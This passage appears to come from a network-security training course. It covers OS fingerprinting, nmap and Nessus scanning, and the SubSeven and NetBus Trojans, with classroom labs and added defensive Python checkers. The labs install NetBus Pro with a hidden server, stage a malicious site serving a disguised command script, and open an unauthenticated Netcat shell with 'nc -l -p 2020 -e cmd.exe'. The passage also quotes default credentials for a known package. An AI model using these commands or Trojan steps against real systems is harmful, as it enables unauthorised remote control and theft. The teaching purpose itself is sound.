9. When the scan is complete, click the Expand All button in the lower-right area of the screen to see what ports are open on the other computers in the classroom.

10. Compare these results with the ones you saw from using nmap. If you need a reminder of the nmap results, see Figure 8-11.

11. Close SuperScan.

Identifying the Operating System and OS Version

Once the hacker has an idea of the available targets, he or she next needs to try to identify what operating system is running and, if possible, the version of the operating system. By learning all of the possible details of a potential target, the hacker knows his or her chances of a successful connection increase drastically. There are several ways a hacker can try to identify the operating systems running on a network. He or she can try banner grabbing, active stack fingerprinting, and passive stack fingerprinting.

Banner grabbing is the oldest and simplest technique for identifying the operating system. A potential hacker tries to telnet to a given target host. That target may prompt for a user name and password. Many times, in the banner message for the telnet session, the system administrator has left clues to, or even has labeled, the identity of the device the hacker is connecting to. For example, Figure 8-15 shows the banner screen for a telnet session.

Figure 8-15: An example of a banner posted as a warning on a router.

A warning message is needed, and required by most security policies; however, giving out too much information is not needed or desirable. There is no need to make a hacker's job easier. Banner grabbing is one of the simplest methods of learning information.


Banner grabbing, in general, is no longer a method that hackers can rely on with any degree of certainty. Most administrators are aware of banner grabbing and no longer have clues to the OS listed in cleartext that anyone can see. In fact, a clever administrator will put in banners from other OSs just to confuse a would-be banner grabber. These are all superficial issues, however, as there are still other instances of too much information easily available, so administrators should double-check their systems.

In addition to banner grabbing from a telnet session, another common technique that hackers can use is to identify the operating system by reading the source code of Web sites. Some Webmasters put relevant information in the comment fields of their Web sites. This information can include what was used to create the Web site, such as Microsoft FrontPage. If FrontPage created the Web site, the hacker can be relatively sure that the site is hosted on a Microsoft box, most likely Windows NT. Figure 8-16 shows an example of a Web source.

Figure 8-16: Viewing the source code of a Web site.

Stack Identification

Once the hacker has checked to see if banner grabbing offers any further details, and finds out that there are none, he or she might move to stack identification. Stack identification is the process of examining the TCP/IP protocol stack that is running.

Although TCP/IP is an industry standard, most vendors have slightly different implementations of TCP running on their systems. By being aware of this, a hacker can look at the way TCP/IP operates on a potential target, and by analyzing this data, make an educated guess at what the OS is.

The specific details of what the hacker will look for vary from person to person, although there are some very common points that most hackers use. The hacker picks up on these small variations of TCP/IP by performing either passive or active fingerprinting.


Active stack fingerprinting is when the hacker sends probes to the potential target, obtains a TCP/IP packet in reply, and dissects that packet looking for these points. The common fingerprint points that hackers look at are the following:

• FIN Probe: The FIN probe takes advantage of the way TCP/IP responds to an open port probe. In many implementations, there will be no response from the probed port. One exception to this is the way Windows NT responds. Windows NT responds with a FIN/ACK response.

• TCP Initial Window Size: In the TCP/IP lesson, we discussed the concept of windowing. Some operating systems use unique values for the initial window size, and this can be used to help identify the operating system.

• Don't Fragment Bit: Some TCP/IP stacks are set to define whether the Don't Fragment bit is turned on or off.

• ICMP Message Quoting: When an error message is quoted by ICMP, some implementations send the IP header with an additional 8 bytes. However, Solaris and Linux will send more. ICMP Message Quoting does not require any listening ports.

Some tools, such as nmap, will try to identify the OS via active stack fingerprinting for the hacker. Figure 8-17 shows an example of nmap active stack fingerprinting.

Figure 8-17: An example of nmap performing active stack OS fingerprinting. Notice the Remote Operating System guess.

Figure 8-18 shows another example of nmap active stack fingerprinting.


Figure 8-18: Another example of nmap performing active stack OS fingerprinting. Notice the Remote Operating System guess.

If the hacker does not choose to use active stack fingerprinting, or wishes to be stealthier, he or she can also try passive stack fingerprinting. Passive stack fingerprinting uses many of the same checks to determine the type of operating system in use. The process is slightly different in that the hacker is not initiating a connection with the potential target. Since there is no established connection, the chances of detection are much lower. However, passive stack fingerprinting requires access to the medium in order to sniff the packets for identification.

The common methods of passive stack fingerprinting include the Window Size and DF (Don't Fragment) bit, as mentioned above. Another common passive stack fingerprinting option is to check the TTL (Time To Live). Some operating systems use a unique value for this setting.
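Passive fingerprinting works from exactly the three fields just named. The following Python example, added here and not part of the course, shows the matching step: rounding an observed TTL up to the stack's initial value (which yields a hop-count estimate as a by-product) and comparing TTL, window size and DF bit against a signature table. The table entries are constructed placeholders, not real operating-system signatures, and the sniffed SYNs are constructed sample data.

```python
from dataclasses import dataclass

# Initial TTL values that IP stacks commonly ship with.  Every router hop
# decrements the field by one, so the value seen on the wire is at most the
# initial one, and rounding up recovers the original.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


@dataclass(frozen=True)
class Observation:
    """The fields a passive fingerprinter reads from one sniffed SYN."""
    ttl: int       # TTL as seen on the wire
    window: int    # TCP window advertised in the SYN
    df: bool       # Don't Fragment bit set


# Constructed signature table: name -> (initial TTL, window, DF).  The values
# are placeholders chosen for illustration, not real OS signatures; a working
# table has hundreds of entries and must be kept current.
SIGNATURES = {
    "stack-A (constructed)": (64, 5840, True),
    "stack-B (constructed)": (128, 65535, True),
    "stack-C (constructed)": (255, 8760, True),
}


def initial_ttl(observed: int) -> int:
    """Round an observed TTL up to the nearest common initial value."""
    if not 0 < observed <= 255:
        raise ValueError("TTL must be between 1 and 255")
    for candidate in COMMON_INITIAL_TTLS:
        if observed <= candidate:
            return candidate
    raise AssertionError("unreachable: 255 always matches")


def hop_distance(observed: int) -> int:
    """Estimated number of routers between the sender and the sniffer."""
    return initial_ttl(observed) - observed


def match(obs: Observation) -> list:
    """Names of every signature consistent with the observation.

    Window size and DF bit are compared exactly; TTL is compared after rounding,
    since the sniffer cannot know how many hops away the sender is."""
    start = initial_ttl(obs.ttl)
    return [
        name
        for name, (ttl, window, df) in SIGNATURES.items()
        if ttl == start and window == obs.window and df == obs.df
    ]


# Constructed sample of three sniffed SYNs from different senders.
SAMPLE_SYNS = [
    Observation(ttl=57, window=5840, df=True),    # 7 hops from a stack-A-like host
    Observation(ttl=120, window=65535, df=True),  # 8 hops from a stack-B-like host
    Observation(ttl=120, window=5840, df=True),   # TTL and window disagree: unknown
]


def fingerprint_all(observations=SAMPLE_SYNS) -> list:
    """Return (matching signature names, estimated hops) for each observation."""
    return [(match(o), hop_distance(o.ttl)) for o in observations]


if __name__ == "__main__":
    for obs, (names, hops) in zip(SAMPLE_SYNS, fingerprint_all()):
        print(f"ttl={obs.ttl} win={obs.window} df={obs.df}: {names or 'no match'}, ~{hops} hops")
```

For a defender the lesson is that these fields leak from every SYN a host sends, so short of normalizing them at the network edge there is nothing to "turn off"; and because real tables contain many near-duplicate entries, an exact match like this one usually returns several candidates rather than a single operating system.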

Using nmap to Identify the OS

We will now look at another useful feature of nmap, which, incidentally, stands for Network MAPper, and is a favored security tool designed for network exploration or security auditing. It is available at www.insecure.org. It can perform fast scans of entire networks and scans individual hosts just as well. It uses raw IP packets to determine which hosts are active on the target network and what ports they have open and listening. It is also able to try to identify the operating system running by matching TCP/IP signatures. There are both command-line and GUI versions, and a version of nmap for NT is also available from www.eEye.com.

security audit: A search through a computer system for security problems and vulnerabilities.


TASK 8D-3: Using nmap to Identify an Operating System

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root.

2. Open a Terminal Window, and enter nmap -sS x.x.x.x -O, where x.x.x.x is the IP address you want to scan and O is the letter O, not the number zero.

3. View the results, noting the open ports, their associated services, and the OS guess at the bottom of the report.

Using the nmap Front End

Since some people do not like using a command line, we will now see that there is a GUI version of nmap called NmapFE.

Figure 8-19: The graphical version of nmap.


TASK 8D-4: Using the nmap Front End

Setup: You are logged on to Linux as root, and a Terminal Window is open.

1. In the Terminal Window, enter nmapfe to run the Nmap Front End.

2. Use the GUI to scan another host in the class, finding open ports and identifying the operating system of the target.

3. Close NmapFE.

Using Nessus to Perform a Scan

To understand the security holes that can be exploited on a system, a full security scan should be used. Nessus is a tool that provides this option. It can perform different types of port scans, and it can report on security holes found in the network.

In this section, screens of Nessus 1.2.7 are shown, even though it is an older version of the software. Visit www.nessus.org to download the latest stable version.

As of the time of this writing, version 2.0.3 was the most current stable version of the tool.


Figure 8-20: The available Nmap scan options in Nessus 1.2.7.

Nessus deals with found exploits a bit differently than other security scanners do. It has the ability to actually try to locate buffer overflows or even to crash servers. Once it has located vulnerabilities, a report is generated that shows what was found.

The security report will list the following items:

• Security risks by rank (High, Med, Low, and Serious).

• Most dangerous services found on the network.

• Services that are most available on the network.

• Operating systems found on the network.

• Further details of each host scanned.

The section with further details on each host is where the vulnerabilities are defined. An example of a detailed report is shown here:


Vulnerability found on port www (80/tcp)

The piranha package is installed on the remote host. This package, as it is distributed with Linux RedHat 6.2, comes with the login/password combination 'piranha/q' (or piranha/piranha)

An attacker may use it to reconfigure your Linux Virtual Servers (LVS).

Solution: upgrade the packages piranha-gui, piranha, and piranha-docs to version 0.4.13

Risk factor: High CVE: CAN-2000-0248

From this report, you are able to identify the vulnerability and proceed to either exploit it (in the case of an attacker) or fix it (in the case of the security administrator). Remember, CVE (Common Vulnerabilities and Exposures) identifies current threats and gives them a standard name/identifier for future use and discussion.
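The report excerpt above is what the scanner produces; what the security administrator needs next is a triage list. The following Python example, added here and not part of Nessus or the course, parses text in that layout into records sorted by risk factor and pulls out the CVE identifiers and the solution text. The sample report is constructed: its first entry repeats the excerpt above, and its second entry is invented to show a lower-ranked finding.

```python
import re
from dataclasses import dataclass, field

# Block header as Nessus 1.x writes it, e.g. "Vulnerability found on port www (80/tcp)"
HEADER_RE = re.compile(
    r"^(Vulnerability|Warning|Information) found on port (\S+) \((\d+)/(tcp|udp)\)\s*$"
)
RISK_RE = re.compile(r"Risk factor:\s*(\w+)")
CVE_RE = re.compile(r"\b(?:CVE|CAN)-\d{4}-\d{4,}\b")
# Solution text runs to the next blank line or to the Risk factor line
SOLUTION_RE = re.compile(r"Solution:\s*(.*?)(?:\n\s*\n|\nRisk factor:|\Z)", re.S)

# Sort order covering the rank labels the course text lists
RISK_RANK = {"Serious": 0, "High": 1, "Medium": 2, "Med": 2, "Low": 3, "None": 4}


@dataclass
class Finding:
    kind: str                 # Vulnerability / Warning / Information
    service: str              # service name Nessus printed, e.g. "www"
    port: int
    proto: str
    risk: str = "None"
    cves: list = field(default_factory=list)
    solution: str = ""
    description: str = ""     # first paragraph of the block


def parse_report(text: str) -> list:
    """Split a Nessus text report into Finding records, worst risk first."""
    blocks = []               # list of (header match, body lines)
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            blocks.append((m, []))
        elif blocks:
            blocks[-1][1].append(line)

    findings = []
    for m, lines in blocks:
        body = "\n".join(lines).strip()
        f = Finding(kind=m.group(1), service=m.group(2),
                    port=int(m.group(3)), proto=m.group(4))
        risk = RISK_RE.search(body)
        if risk:
            f.risk = risk.group(1)
        f.cves = CVE_RE.findall(body)
        sol = SOLUTION_RE.search(body)
        if sol:
            f.solution = " ".join(sol.group(1).split())
        f.description = " ".join(body.split("\n\n", 1)[0].split())
        findings.append(f)

    findings.sort(key=lambda f: (RISK_RANK.get(f.risk, 99), f.port))
    return findings


def count_by_risk(findings) -> dict:
    """How many findings fall at each rank, for a one-line summary."""
    counts = {}
    for f in findings:
        counts[f.risk] = counts.get(f.risk, 0) + 1
    return counts


# Constructed sample report: the first entry repeats the excerpt in the text,
# the second is invented to show a lower-ranked finding.
SAMPLE_REPORT = """\
Vulnerability found on port www (80/tcp)

The piranha package is installed on the remote host. This
package, as it is distributed with Linux RedHat 6.2, comes with
the login/password combination 'piranha/q' (or piranha/piranha)

An attacker may use it to reconfigure your Linux Virtual Servers
(LVS).

Solution: upgrade the packages piranha-gui, piranha, and
piranha-docs to version 0.4.13

Risk factor: High CVE: CAN-2000-0248

Warning found on port telnet (23/tcp)

The telnet service is running. (constructed entry)

Solution: disable it and use SSH instead

Risk factor: Low
"""


def run_sample() -> list:
    return parse_report(SAMPLE_REPORT)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.risk:8} {f.port}/{f.proto} {f.service}: {', '.join(f.cves) or 'no CVE'}")
        print(f"         fix: {f.solution}")
    print(count_by_risk(run_sample()))
```

Sorting on the rank first and the port second means the administrator reads the Serious and High entries before anything else, and the CVE list gives a stable identifier to track each item across later rescans.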

Figure 8-21: An example report after Nessus 1.2.7 has finished scanning.


TASK 8D-5: Installing Nessus for First-time Use

Setup: You are logged on to Linux as root, and a Terminal Window is open.

1. In your /root directory, create a directory named nessus.

2. Copy the Nessus installer script file from the location provided by your instructor to the new /root/nessus directory.

3. In the Terminal Window, switch to the /root/nessus directory and enter sh nessus-installer.sh to begin the installation.

4. Follow the prompts, and accept the default installation directory of /usr/local.

5. Ignore any warning messages that are displayed, and wait for the installer script to complete. This will take several minutes, so please be patient.

6. If necessary, press Enter to accept the default file location.

7. Observe the Congratulation message that is displayed when installation is complete. The message lists instructions for several tasks related to setting up Nessus. Let's create a certificate first. Press Enter.

8. Enter nessus-mkcert and accept the default values for lifetimes.

9. Enter the applicable data for Country, State/Province, and Location.

10. For Organization, enter SCNPclass.

11. After the certificates are created, press Enter to return to the command line. Next, we'll create a user.

12. Enter nessus-adduser and for Login, enter testuser.

13. For Authentication, press Enter to select the default of password.

14. For Password, enter password.

15. For the Rules, you will use an Empty Rule Set. Press Ctrl+D to finish this part of the Nessus setup.

16. Answer Yes when you are prompted.

Scanning for Vulnerabilities with Nessus

We will now see how Nessus is used to scan a target network. You first need to start the Nessus daemon; then, you can scan hosts and networks for security vulnerabilities.

Provide students with the location of the Nessus installer script file.


TASK 8D-6: Using Nessus for Vulnerability Scanning

Setup: You are logged in to Linux as root, the Nessus tool has been installed, and a nessus user has been created.

1. If necessary, open a Terminal Window, and enter nessusd -D to start the Nessus daemon. After a short pause, the command line is displayed.

2. Enter nessus to open the Nessus Setup window.

3. On the Nessusd Host tab, log in with the user account testuser and the password password. Click Log In.

4. Click OK to close the SSL Setup window, then click Yes to accept the certificate.

5. Click OK to close the Warning box.

6. Once you are logged in, on the Target Selection tab, enter a target IP address in the class.

7. Click the Start The Scan button. This scan will take a few minutes to complete, so please be patient.

8. When the scan has ended, view the results.

9. Under Subnet, select the target. Under Host, select the target. Under Port, select a port that has an exclamation point icon. Under Severity, select Security Warning, and read the information displayed in the lower-right pane.

10. Under Port, select a port that has a red circle with a yellow bar inside it. Under Severity, select Security Hole, and read the information displayed in the lower-right pane.

11. Observe that you can even save the report in several formats on the hard drive for later review.

12. Close all open windows. You can save the report if you like.

You might need to move the window up to reach the Start The Scan button.


Topic 8E: Viruses, Worms, and Trojan Horses

When networks were not as big a part of business and everyday life as they are now, the concept of having a virus on the computer was unknown to most people. Today, there are millions and millions of people who are aware, in one way or another, that there are such things as computer viruses, and that they usually are bad. Although all these people are aware that such creatures exist, many network administrators cannot tell the difference between a virus and a worm.

Differentiating Between a Virus and a Worm

Just as the media lumps every computer criminal under the term hacker, the same goes for the virus and worm (as well as the Trojan Horse, for that matter). So, virtually every incident with one of these programs will be referred to by the major media as a virus.

For this topic, we shall refer to the NSA definitions:

• A virus is a program that can infect other programs by modifying them to include a possibly evolved copy of itself.

• A worm is an independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.

To put this in perspective, the names of these programs are appropriate. A virus requires a host while a worm does not. The worm is self-sufficient, and the virus is not. This distinction should make it clear that a worm is more dangerous to the network than a virus is.

The vast majority of viruses used to be transmitted on floppy disks. But, thanks to the wonderful connectivity the Internet provides, the hacker does not need to be limited to getting a floppy disk into the network to do the job. A simple email will do. Even with all the publicity about opening attachments, spreading a virus or worm via an email attachment is still the most prevalent way to spread the program.

Outlook and Outlook Express became the method of choice for transmitting email viruses and worms over the last few years. Even casual users became aware of the names Melissa, Worm.Explore.Zip, BubbleBoy, ILoveYou, and so on. These simple worms would simply replicate themselves to the names and addresses in a user's Address Book. This made the worm seem to come from a trusted source. It was due to this deception that these worms moved around networks so quickly.

Sending a virus or worm hidden in a Trojan Horse is one of the common ways to move a malicious program around the network.

Viruses, Worms, and Trojan Horses


The Trojan Horse

To complement the worm and virus discussion, one needs to discuss the Trojan Horse. Generally, a Trojan Horse is a program disguised as something else to allow for the installation and execution of one of the previously mentioned remote-control applications. The "something else" that intelligent hackers will often disguise their application as is a small game program.

There is a reason for this. Most people cannot help but play a new, addictive, small, easy-to-play game. And, if it is simple and fun enough, it will circulate around an office very quickly.

Perhaps the most infamous example of the Trojan Horse doing this very function is the game Whack-A-Mole. This game is, in fact, the Trojan Horse for NetBus. This program spread around many companies very quickly and is still in wide circulation. Most people will be very surprised when you inform them they have run a Trojan Horse program. Figure 8-22 shows some of the capabilities of NetBus. More about NetBus is included later in this topic.

Figure 8-22: An example of the control portion of NetBus version 1.70. Notice the different options on the various buttons.

Another very smart Trojan Horse example is BoSniffer. This program is billed as a program to search out and clean Back Orifice from a given system, when it is really Back Orifice itself! So the net result is that running this program to remove Back Orifice from a system actually installs it. Very clever.

The SubSeven Trojan

SubSeven is one of the most widely used Trojan Horse programs available. Most hackers are aware of SubSeven and what it can do. In order for you to properly understand how to defend against this program, you must use it firsthand yourself.

Controlling the Target


A common way for SubSeven to be packaged is as a zip file containing three EXE files. These three files are the files used to run and manage the program. They are:

• Server.exe. This is the file that is installed on the victim's computer.

• Sub7.exe. This is the file used by the attacker to control the victim's computer.

• EditServer.exe. This is the file that can be used to modify the available options that the server.exe can provide to the attacker.

Some of the options that the EditServer.exe has are:

• Define the port on the victim that SubSeven will use.

• Define a password to protect the server program.

• Define email options. These options include:

— Email every pressed key to an email address.

— Email every password to an attacker.

— Email passwords for connections to the Internet to the attacker.

• Define notification options. This can be most dangerous, as the notification options are:

— Email the attacker every time the server application runs.

— Notify the attacker via IRC when the server application runs.

— Notify the attacker via ICQ when the server application runs.

When SubSeven is installed on a computer, several files and Registry entries will be modified. Examples of the files that can be found on an infected computer are:

• Server.exe

• Rundll1.exe

• Systray.dll

• Task_Bar.exe

• FAVPNMCFEE.dll

• MVOKH_32.dll

• Nodll.exe

• Watching.dll

In addition to files added to the victim computer, several config files may be modified as well. Examples of the modified files are:

• Win.ini—this file will have a modification to the load= or run= statement.

• System.ini—this file will have a modification to the shell= statement.

NetBus

Any discussion of Trojan Horse programs would be incomplete without examples and using NetBus. Most hackers are aware of NetBus and what it can do. In order for you to properly understand how to defend against this program, you must use it firsthand yourself.

NetBus uses a two-part system to control a victim computer. There is a server program that must be executed on the target computer and a client program that the attacker will run to take control of the target.


The server program can be renamed to anything the attacker wants to use, and often will be in order to better hide the application from detection. Common examples of the renamed server program could be Explore.exe or winsys32.exe, with the point being to make the application look like a system file.

Different versions of NetBus have used different names for the server program. It has been called sysedit.exe, patch.exe, and server.exe. NetBus commonly uses port 12345 to connect, although newer releases allow for modification of the server port to use.

Regardless of the server name, it should be found in the Registry in the following location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
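The indicators listed for SubSeven (dropped files, the Win.ini load=/run= and System.ini shell= edits) and for NetBus (server names, the Run key, port 12345) are what an administrator checks a suspect machine for. The following Python example, added here and not taken from the course, turns them into three checks: it parses INI text for those statements, looks for the server names in a Run-key listing, and flags a listener on port 12345 in netstat -an output. All inputs are constructed samples passed in as strings and a dict, so it runs offline; reading the live Registry would use the winreg module and is not shown.

```python
import re

# Indicators from the course text: files SubSeven drops, the Win.ini and
# System.ini statements it edits, the names NetBus's server has used (including
# the look-alike names the text gives as examples), its Run-key persistence and
# its default port.  Names are compared case-insensitively, as Windows does.
SUBSEVEN_FILES = {"server.exe", "rundll1.exe", "systray.dll", "task_bar.exe",
                  "favpnmcfee.dll", "mvokh_32.dll", "nodll.exe", "watching.dll"}
NETBUS_SERVER_NAMES = {"sysedit.exe", "patch.exe", "server.exe",
                       "explore.exe", "winsys32.exe"}
NETBUS_DEFAULT_PORT = 12345
STOCK_SHELL = "explorer.exe"   # what the System.ini shell= line normally holds


def check_ini(win_ini: str, system_ini: str) -> list:
    """Flag non-empty load=/run= lines in Win.ini and a changed shell= in System.ini."""
    findings = []
    for line in win_ini.splitlines():
        m = re.match(r"^\s*(load|run)\s*=\s*(\S.*)$", line, re.I)
        if m:
            findings.append(f"Win.ini {m.group(1).lower()}= launches {m.group(2).strip()}")
    for line in system_ini.splitlines():
        m = re.match(r"^\s*shell\s*=\s*(.*)$", line, re.I)
        if m and m.group(1).strip().lower() != STOCK_SHELL:
            findings.append(f"System.ini shell= changed to {m.group(1).strip()}")
    return findings


def executable_name(command: str) -> str:
    """Lower-case file name of the program a Run-key command line starts,
    handling both quoted paths with spaces and bare names."""
    command = command.strip()
    if command.startswith('"'):
        head = command[1:].split('"', 1)[0]
    else:
        head = command.split()[0] if command.split() else ""
    return head.split("\\")[-1].lower()


def check_run_key(values: dict) -> list:
    """values maps value names to command lines as read from
    HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    (reading the live key would use the winreg module; not done here)."""
    findings = []
    for name, command in values.items():
        exe = executable_name(command)
        if exe in NETBUS_SERVER_NAMES or exe in SUBSEVEN_FILES:
            findings.append(f"Run value '{name}' starts known Trojan server name {exe}")
    return findings


def check_netstat(netstat_output: str) -> list:
    """Flag a TCP listener on the NetBus default port in `netstat -an` output."""
    findings = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            if port == NETBUS_DEFAULT_PORT:
                findings.append(f"TCP port {port} is listening (NetBus default port)")
    return findings


# Constructed sample inputs standing in for the real files, Registry key and
# netstat output of an infected machine.
SAMPLE_WIN_INI = "[windows]\nload=\nrun=C:\\WINDOWS\\Task_Bar.exe\n"
SAMPLE_SYSTEM_INI = "[boot]\nshell=Explorer.exe Nodll.exe\n"
SAMPLE_RUN_KEY = {
    "Task Scheduler Service": "C:\\WINNT\\patch.exe /nomsg",
    "SystemTray": "SysTray.Exe",
}
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    10.0.0.5:139           10.0.0.7:1044          ESTABLISHED
"""


def run_sample() -> dict:
    """Run all three checks over the constructed samples."""
    return {
        "ini": check_ini(SAMPLE_WIN_INI, SAMPLE_SYSTEM_INI),
        "run_key": check_run_key(SAMPLE_RUN_KEY),
        "netstat": check_netstat(SAMPLE_NETSTAT),
    }


if __name__ == "__main__":
    for area, hits in run_sample().items():
        for hit in hits:
            print(f"[{area}] {hit}")
```

The name lists are only as good as the day they were written, since the text itself notes the server can be renamed to anything and newer releases can change the port; the checks that survive renaming are the ones on behaviour, namely a non-empty load=/run= line, a shell= line that no longer reads just Explorer.exe, and a listener the administrator cannot account for.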

Several versions of NetBus are available on the Internet. In this section, we will discuss two different versions: one slightly older version, named NetBus 1.7, and a newer version, named NetBus Pro. Then, you will try out NetBus Pro in a hands-on activity.

NetBus 1.7

NetBus 1.7 has a simple interface, with options such as opening and closing the CD-ROM or sending system messages. It also has the ability to provide more serious functions, such as shutting down the remote computer, viewing remote files, and sending the remote host to a URL. While the last option may not seem that critical, in an environment where Internet use is a strict and regulated policy, sending a remote computer to a known disallowed URL can have a serious impact.

Figure 8-23: An example of available options for NetBus version 1.7.

NetBus Pro

NetBus Pro is a more advanced version of NetBus than version 1.7. Many of the options are the same; however, there are differences, as you will see. Figure 8-24 shows some of the available options in NetBus Pro.


Figure 8-24: Options available in NetBus Pro.

TASK 8E-1: Using NetBus Pro

Setup: You are logged on to Linux as root. Your instructor will assign each of you a role as an attacking computer or a target computer. For instance, if you were designated as Student_P earlier in the course, you might now be designated as an attacker for this task.

Note: Perform the following step on all student computers.

1. Boot to Windows 2000, and log on as the renamed Administrator account. Run the NetBus Pro setup program from the location provided by your instructor.

Note: Perform the following step only if you are designated as an attacking computer for this task.

2. Run the NetBus Pro application to open the control portion of the program.

Note: Perform step 3 and step 4 only if you are designated as a target computer for this task.

3. Start NetBus Server, click Settings, and check Accept Connections.

4. Under Visibility Of Server, select Only In Tasklist, and click OK.

Provide students with the location of the NetBus Pro installation files.


Note: Perform step 5 through step 7 only if you are designated as an attacking computer.

5. In the NetBus Pro application, choose Host→New, and enter the IP address of the target computer. Click OK. The target should now be listed in the GUI as a destination.

6. Right-click the target computer, and choose Connect.

7. Once you are connected, try some of the different options, such as opening and closing the CD-ROM bay, capturing screen images, keyboard listening, and so forth.

Note: Perform the rest of this task on all student computers.

8. Close all open windows, and reboot to Windows 2000 as the renamed Administrator account.

9. Repeat this task, switching roles with your partner.

Topic 8F: Malicious Web Sites

In another lesson, you studied some of the techniques used by malicious Web sites to target ordinary users. Indeed, most attacks targeting ordinary users are rather unsophisticated and depend on computerized social engineering to get the job done—that is, getting the user to agree to something, such as downloading a file or clicking OK on some kind of executable, script, or batch file.

In the following task, the instructor will set up a simple and innocent-looking Web site. The Web site claims to help a user verify his or her browser's security and offers various templates for the job. When the user clicks on a template, an error pops up telling the user that the required font was not found and offers a link to install the appropriate font, with instructions to the user to click Open. When the user clicks on the link to the font, a popup shows up, the user clicks Open, there's a brief flicker on the screen, and the user has just installed something malicious.

INSTRUCTOR TASK 8F-1: Implementing a Malicious Web Site

Setup: Observe as your instructor performs this task on the instructor machine.

1. If necessary, log on to your Windows 2000 Server as the renamed Administrator account.

2. Navigate to the \085545\Data\HTML Files folder on the course CD.

If time permits, allow students 5 to 10 minutes to explore the NetBus options.


3. Copy the Malweb subfolder onto your boot partition, in the Inetpub folder.

4. Navigate to the \WINNT\Help\iishelp\common folder.

5. Rename the 404b.htm file as 404b-old.htm.

6. From the Inetpub\Malweb folder, copy the file 404b.htm to the WINNT\Help\iishelp\common folder.

7. Start Internet Services Manager.

8. In the left pane, expand the host, right-click Default Web Site, and choose Stop.

9. Right-click Default Web Site, and choose Properties.

10. Click the Home Directory tab. Browse to navigate to the Inetpub\Malweb folder and click OK.

11. Click the Documents tab, then click Add.

12. For Add Default Document, enter malweb.htm, and click OK.

13. Select malweb.htm, and click the Up Arrow button until the file is at the top of the list.

14. Click OK.

15. If necessary, click OK to close the Inheritance Overrides information box.

16. Right-click Default Web Site, and choose Start.

Falling Victim to a Malicious Web Site

Now, let’s see what happens to the unsuspecting user when he or she happens upon the Malweb site that your instructor just implemented.

TASK 8F-2

Visiting a Malicious Web Site

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Start Internet Explorer.

2. In the Address box, enter http://172.17.10.1. If the Content Advisor opens, enter the password 1234 and click OK to be able to view the site.

You should be presented with a Web site indicating that your browser may not be secure and that you can evaluate your browser’s security using a template.


3. Click any one of the templates (T1, T2, or T3) to display a page that indicates a required font was not found.

4. Click the Back button, or click the link to go back to 172.17.10.1’s home page.

5. Now, read the instructions regarding fonts.

6. You’re a savvy computer user, so place your mouse over the hyperlink in the sentence “Please install the following font.”

7. At the bottom of your browser window, read the explanation for the link. It should say http://172.17.10.1/acrylic1.fnt, so it’s OK—it’s only a font, not a malicious program. Your guard is down.

8. Open Windows Explorer, and navigate to the \085545\Data\HTML Files folder on your course CD. Examine the file acrylic1.fnt. Widen the File Name column to view the entire file name. This isn’t really a font file, it’s a command script!

9. Close all open windows.

Topic 8G

Gaining Control Over the System

Netcat is a tool that can connect to any computer it can reach, and can just as easily listen for incoming connections itself. This is part of the danger of using such a powerful tool. Sitting at a Windows 2000 computer, you can gain control of a Linux box, and sitting at a Linux computer, you can gain control of a Windows computer. All without having to provide any authentication!

We will see how a system can be compromised by using Netcat.

TASK 8G-1

Using Netcat

Setup: You are logged on to Windows 2000 as the renamed Administrator account. Your instructor will tell you whether you are to play the role of target computer or attacking computer.

Note: Perform step 1 through step 5 only if you are designated as a target computer.

1. At the root of your boot partition, create a folder called nc.

2. Copy the Netcat files from the location provided by your instructor to the new nc folder.

3. If necessary, unzip the Netcat files.

Provide students with the location of the Netcat files.


4. Open a Command Prompt, and switch to the nc directory.

5. Enter nc -l -p 2020 -e cmd.exe.

Note: Perform step 6 through step 11 only if you are designated as an attacking computer.

6. Log on to Linux as root.

7. Open a Terminal Window.

8. Enter nc target_IP_address 2020.

9. Observe that you now have what looks very much like a Windows command prompt. There is a very good reason for that—it is! Navigate around and see that you have full control, just as if you were sitting at the Windows machine with an open command prompt. Do not do anything that will disrupt the normal functions of the machine.

10. Enter exit to return to the Linux machine.

11. Reboot to Windows 2000 as the renamed Administrator account.

Note: Perform the next step only if you are designated as a target computer.

12. Close all open windows.
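The following Python script is an added example, not part of the course materials: it shows how a defender would spot the listener that the target computer created in this task by comparing netstat output against a known-good baseline of listening ports. It assumes a netstat that prints the owning PID (`netstat -ano`, Windows XP and later); the sample rows, the PID-to-image map and the baseline are all constructed for the example.

```python
"""Triage Windows netstat output for unexpected listening sockets.

Added example for the Netcat task: a defender's view of a host on which
`nc -l -p 2020 -e cmd.exe` has been started. Assumes a netstat that prints
the owning PID (`netstat -ano`, Windows XP and later). Sample rows, the
PID-to-image map and the baseline are constructed for this example.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING       1840
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       404
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       8
  TCP    0.0.0.0:2020           0.0.0.0:0              LISTENING       1840
  TCP    172.17.10.5:139        0.0.0.0:0              LISTENING       8
  TCP    172.17.10.5:2020       172.17.10.9:1043       ESTABLISHED     1840
  UDP    0.0.0.0:445            *:*                                    8
"""

# Constructed PID -> image map, as a `tasklist` listing would give it.
PID_TO_IMAGE: Dict[int, str] = {8: "System", 404: "svchost.exe", 1840: "nc.exe"}

# Assumed known-good baseline for this host: (proto, port) -> expected image.
BASELINE: Dict[Tuple[str, int], str] = {
    ("TCP", 23): "tlntsvr.exe",
    ("TCP", 135): "svchost.exe",
    ("TCP", 139): "System",
    ("TCP", 445): "System",
    ("UDP", 445): "System",
}

# One netstat row. UDP rows carry no State column, so that group is optional.
_ROW = re.compile(
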